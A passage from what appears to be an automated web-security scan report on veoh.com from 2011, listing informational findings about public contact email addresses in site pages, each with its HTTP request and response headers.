Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 105468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.194. http://www.veoh.com/corporate/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/aboutus

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate/aboutus HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 26605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:advertising@veoh.com">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.195. http://www.veoh.com/corporate/copyright  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/copyright

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/copyright HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<br/>copyright-notice@veoh.com
<br/>
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.196. http://www.veoh.com/corporate/pressroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/pressroom

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/pressroom HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 39434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:josh@sternbergcommunications.com">josh@sternbergcommunications.com</a>
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.197. http://www.veoh.com/corporate/privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/privacypolicy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/privacypolicy HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=21
Content-Length: 36356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:privacy@veoh.com">privacy@veoh.com</a>
...[SNIP]...
certain communications from us regarding products and services in which you may be interested. If you do not opt-out at the time you provide information, but choose to opt-out later, send an email to optout@veoh.com or click <a href="mailto:optout@veoh.com">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.198. http://www.veoh.com/corporate/termsofuse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/termsofuse

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate/termsofuse HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.199. http://www.veoh.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download

Issue detail

The following email address was disclosed in the response:

Request

GET /download HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 25488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.200. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The following email address was disclosed in the response:

Request

GET /download/index/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 27106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.201. http://www.veoh.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /faq

Issue detail

The following email address was disclosed in the response:

Request

GET /faq HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 24099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.202. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The following email address was disclosed in the response:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.203. http://www.veoh.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /help

Issue detail

The following email address was disclosed in the response:

Request

GET /help HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 24102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.204. http://www.veoh.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The following email address was disclosed in the response:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.205. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The following email address was disclosed in the response:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.206. http://www.veoh.com/metrics/logadevent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /metrics/logadevent

Issue detail

The following email address was disclosed in the response:

Request

GET /metrics/logadevent HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 28568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.207. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The following email address was disclosed in the response:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.208. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The following email address was disclosed in the response:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
